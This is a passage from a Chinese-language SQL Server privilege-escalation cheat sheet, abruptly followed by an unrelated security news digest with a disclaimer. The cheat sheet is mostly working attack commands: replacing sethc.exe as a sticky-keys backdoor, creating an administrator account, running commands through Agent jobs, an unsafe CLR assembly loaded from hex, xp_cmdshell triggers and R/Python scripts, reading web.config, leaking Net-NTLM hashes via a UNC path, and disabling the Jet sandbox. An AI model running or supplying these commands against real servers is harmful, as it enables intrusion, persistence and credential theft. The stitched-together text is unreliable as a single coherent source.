EXEC sp_oamethod @s,[run],NULL,[c:\\www\\ffffffff0x.vbs] -- 复制具有不同名称和位置的 calc.exe 可执行文件 （测试未成功） declare @ffffffff0x int; exec sp_oacreate 'scripting.filesystemobject', @ffffffff0x out; exec sp_oamethod @ffffffff0x,'copyfile',null,'c:\\windows\\system32\calc.exe','c:\\windows\\system32\calc_copy.exe'; -- 移动文件 （测试好像只有 利用写入的VB脚本才能创建） declare @ffffffff0x int exec sp_oacreate 'scripting.filesystemobject',@ffffffff0x out exec sp_oamethod @ffffffff0x,'movefile',null,'c:\\www\\1.txt','c:\\www\\3.txt' -- 替换粘滞键 declare @ffffffff0x int; exec sp_oacreate 'scripting.filesystemobject', @ffffffff0x out; exec sp_oamethod @ffffffff0x,'copyfile',null,'c:\\windows\\system32\calc.exe','c:\\windows\\system32\sethc.exe'; declare @ffffffff0x int; exec sp_oacreate 'scripting.filesystemobject', @ffffffff0x out; exec sp_oamethod @ffffffff0x,'copyfile',null,'c:\windows\system32\sethc.exe','c:\windows\system32\dllcache\sethc.exe' -- 使用JavaScript创建账户，更改其密码并将新账号添加到管理员组 （测试未成功） declare @ffffffff0x int EXEC sp_OACreate 'ScriptControl',@ffffffff0x OUT EXEC sp_OASetProperty @ffffffff0x, 'Language','JavaScript' EXEC sp_OAMethod @ffffffff0x, 'Eval', NULL,'var o=new ActiveXObject("Shell.Users");z=o.create("testuser");z.changePassword("123456!@#","");z.setting("AccountType")=3;'; SQL Server Agent Job 代理执行计划任务 描述： SQL Server 代理是一项 Microsoft Windows 服务，它执行计划的管理任务，这些任务在 SQL Server 中称为作业。 利用条件： 拥有 DBA 权限 需要 sqlserver 代理 (sqlagent) 开启，Express 版本Sql Server 是无法启用的 -- 开启 sqlagent 服务 (还是没有权限，很纳闷，sa账户登录 还没权限) exec master.dbo.xp_servicecontrol 'start','SQLSERVERAGENT'; -- 利用任务计划命令执行（无回显,可以 dnslog） -- 创建任务 test，这里test为任务名称，并执行命令，命令执行后的结果，将返回给文本文档out.txt use msdb; exec sp_delete_job null,'test' exec sp_add_job 'test' exec sp_add_jobstep null,'test',null,'1','cmdexec','cmd /c "whoami>c:/out.txt"' exec sp_add_jobserver null,'test',@@servername exec sp_start_job 'test'; CLR提权 描述： 从 SQL Server 2005 (9.x) 开始，SQL Server 集成了用于 Microsoft Windows 的 .NET Framework 的公共语言运行时 (CLR) 组件。 这意味着现在可以使用任何 .NET Framework 语言（包括 Microsoft Visual Basic .NET 和 Microsoft Visual C#）来编写存储过程、触发器、用户定义类型、用户定义函数、用户定义聚合和流式表值函数。 - https://docs.microsoft.com/zh-cn/sql/relational-databases/clr-integration/c CLR 方式可以利用 16 进制文件流方式导入 DLL 文件，不需要文件落地 https://github.com/SafeGroceryStore/MDUT/blob/main/MDAT-DEV/src/main/Plugins/Mssql/clr.txt dll的制作可以参考下面的文章 https://xz.aliyun.com/t/10955#toc-12 利用条件： 拥有DBA权限 -- 启用CLR,SQL Server 2017版本之前 sp_configure 'show advanced options',1;RECONFIGURE; -- 显示高级选项 sp_configure 'clr enabled',1;RECONFIGURE; -- 启用CLR ALTER DATABASE master SET TRUSTWORTHY ON; -- 将存储.Net程序集的数据库配置为可信赖的 -- 启用CLR，SQL Server 2017版本及之后,引入了严格的安全性，可以选择根据提供的 SHA512 散列专门授予单个程序集的 UNSAFE 权限 sp_configure 'show advanced options',1;RECONFIGURE; sp_configure 'clr enabled',1;RECONFIGURE; sp_add_trusted_assembly @hash= <SHA512 of DLL>; -- 将某程序集的SHA512哈希值添加到可信程序集列表中 -- 配置 EXTERNAL ACCESS ASSEMBLY 权限, test 是我指定的数据库 EXEC sp_changedbowner 'sa' ALTER DATABASE [test] SET trustworthy ON -- 导入CLR插件 CREATE ASSEMBLY [mssql_CLR] AUTHORIZATION [dbo]  FROM 0x4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A2400000000000000504500004C0103006607056200000000000  WITH PERMISSION_SET = UNSAFE; GO -- 创建CLR函数 CREATE PROCEDURE [dbo].[ExecCommand] @cmd NVARCHAR (MAX) AS EXTERNAL NAME [mssql_CLR].[StoredProcedures].[ExecCommand] go -- 利用CLR执行系统命令 exec dbo.ExecCommand "whoami /all"; ------------------------------------------------------------------------------------------------------------------------------ -- 格式简化 -- 导入CLR插件 CREATE ASSEMBLY [clrdata] AUTHORIZATION [dbo] FROM 0x16进制的dll WITH PERMISSION_SET = UNSAFE; -- 创建CLR函数 CREATE PROCEDURE [dbo].[testclrexec] @method NVARCHAR (MAX) , @arguments NVARCHAR (MAX) AS EXTERNAL NAME [clrdata].[StoredProcedures].[testclrexec] -- 利用CLR执行系统命令 exec testclrexec 'cmdexec',N'whoami' 触发器提权 触发器是一种特殊类型的存储过程，它不同于存储过程。触发器主要是通过事件进行触发被自动调用执行的。而存储过程可以通过存储过程的名称被调用。 SqlServer 包括三种常规类型的触发器：DML 触发器、DDL 触发器和登录触发器 登录触发器： 登录触发器将为响应 LOGIN 事件而激发存储过程。与 SQL Server 实例建立用户会话时将引发此事件。登录触发器将在登录的身份验证阶段完成之后且用户会话实际建立之前激发。因此，来自触发器内部且通常将到达用户的所有消息(例如错误消息和来自 PRINT 语句的消息)会传送到 SQL Server 错误日志。如果身份验证失败，将不激发登录触发器。 -- 设置一个触发器 ffffffff0x,当 user 表更新时触发命令 (user 表 必须存在，且 容易 卡死 因为这个calc在运行 查询就不会停止) set ANSI_NULLS on go set QUOTED_IDENTIFIER on go create trigger [ffffffff0x] on [user] AFTER UPDATE as begin   execute master..xp_cmdshell 'cmd.exe /c calc.exe' end go -- user 表 update 更新时，自动触发 UPDATE user SET id = '22' WHERE nickname = 'f0x' SQL Server R 和 Python 的利用 描述 在 SQL Server 2017 及更高版本中，R 与 Python 一起随附在机器学习服务中。该服务允许通过 SQL Server 中 sp_execute_external_script 执行 Python 和 R 脚本 利用条件： Machine Learning Services 必须要在 Python 安装过程中选择 必须启用外部脚本 EXEC sp_configure 'external scripts enabled', 1 RECONFIGURE WITH OVERRIDE 重新启动数据库服务器 用户拥有执行任何外部脚本权限 -- R脚本利用 -- 利用 R 执行命令 sp_configure 'external scripts enabled' GO EXEC sp_execute_external_script @language=N'R', @script=N'OutputDataSet <- data.frame(system("cmd.exe /c dir",intern=T))' WITH RESULT SETS (([cmd_out] text)); GO -- 利用 R 抓取 Net-NTLM 哈希 @script=N'.libPaths("\\\\testhost\\foo\\bar");library("0mgh4x")' -- Python脚本利用 -- 查看版本 exec sp_execute_external_script @language =N'Python', @script=N'import sys OutputDataSet = pandas.DataFrame([sys.version])' WITH RESULT SETS ((python_version nvarchar(max))) -- 利用 Python 执行命令 exec sp_execute_external_script @language =N'Python', @script=N'import subprocess p = subprocess.Popen("cmd.exe /c whoami", stdout=subprocess.PIPE) OutputDataSet = pandas.DataFrame([str(p.stdout.read(), "utf-8")])' -- 利用 Python 读文件 EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(open("C:\\inetpub\\wwwroot\\web.config", "r").read())' WITH RESULT SETS (([cmd_out] nvarchar(max))) AD Hoc 分布式查询 & Microsoft OLE DB Provider for Microsoft Jet (沙盒提权) AD Hoc 分布式查询允许从多个异构数据源（例如 SQL Server 的多个实例）访问数据。这些数据源可以存储在相同或不同的计算机上。启用临时访问后，登录到该实例的任何用户都可以使用 OLE DB 提供程序通过 OPENROWSET 或 OPENDATASOURCE 函数执行引用网络上任何数据源的 SQL 语句。 攻击者滥用 Ad Hoc 分布式查询和 Microsoft OLE DB Provider for Microsoft Jet 来创建和执行旨在从远程服务器下载恶意可执行文件的脚本。 利用条件 拥有 DBA 权限 sqlserver 服务权限为 system 服务器拥有 jet.oledb.4.0 驱动 -- 修改注册表，关闭沙盒模式 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0 -- 开启 Ad Hoc Distributed Queries EXEC sp_configure 'show advanced options', 1 RECONFIGURE GO EXEC sp_configure 'ad hoc distributed queries', 1 RECONFIGURE GO -- Until SQL Server 2012 EXEC sp_MSset_oledb_prop N'Microsoft.ACE.OLEDB.12.0', N'AllowInProcess', 1 EXEC master.dbo.sp_MSset_oledb_prop N'Microsoft.Jet.OLEDB.4.0', N'AllowInProcess', 1 -- SQL Server 2014 or later EXEC sp_MSset_oledb_prop N'Microsoft.ACE.OLEDB.12.0', N'DynamicParameters', 1 EXEC master.dbo.sp_MSset_oledb_prop N'Microsoft.Jet.OLEDB.4.0', N'DynamicParameters', 1 -- Windows 2003 系统 c:\windows\system32\ias\ 目录下默认自带了 2 个 Access 数据库文件 ias.mdb/dnary.mdb, 所以直接调用即可. -- Windows 2008 R2 默认无 Access 数据库文件, 需要自己上传, 或者用 UNC 路径加载文件方能执行命令. -- SQL Server2008 默认未注册 microsoft.jet.oledb.4.0 接口, 所以无法利用沙盒模式执行系统命令. Select * From OpenRowSet('microsoft.jet.oledb.4.0',';Database=c:\windows\system32\ias\ias.mdb', 'select shell("whoami")'); select * from openrowset('microsoft.jet.oledb.4.0',';database=\\192.168.1.8\file\ias.mdb','select shell("c:\windows\system32\cmd.exe /c net user >c:\test.txt ")');

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、Device42 IT资产管理平台被发现多个严重漏洞 https://www.securityweek.com/critical-vulnerabilities-found-device42-asset-management-platform 2、Palo Alto Networks PAN-OS存在漏洞被用于反射型放大DoS攻击 https://www.securityweek.com/palo-alto-networks-firewalls-targeted-reflected-amplified-ddos-attack 3、思科修补了ASA和Firepower软件中的高危RSA私钥泄露漏洞 https://www.securityweek.com/cisco-patches-high-severity-vulnerability-security-solutions 4、Cuba勒索软件的攻击者使用新的远控木马 https://thehackernews.com/2022/08/hackers-behind-cuba-ransomware-attacks.html 5、公安部：刷单类电信网络诈骗案持续高发，占全部电诈案四成 https://www.ithome.com/0/634/257.htm 6、美国对朝鲜黑客关联加密货币 Tornado Cash 实施制裁 https://www.secrss.com/articles/45636 7、Cloudflare 员工也受到 Twilio 泄露事件背后的黑客攻击 https://www.bleepingcomputer.com/news/security/cloudflare-employees-also-hit-by-hackers-behind-twilio-breach/ 8、PyPI 中发现新的窃取用户凭证的恶意 Python 库 https://www.infosecurity-magazine.com/news/malicious-python-libraries-found/ 9、因客户信息安全管理不到位，农行被罚 30 万一人被禁业 3 年 https://www.mpaypass.com.cn/news/202208/10111401.html 10、《云计算安全责任共担模型》行业标准正式发布 https://www.secrss.com/articles/45623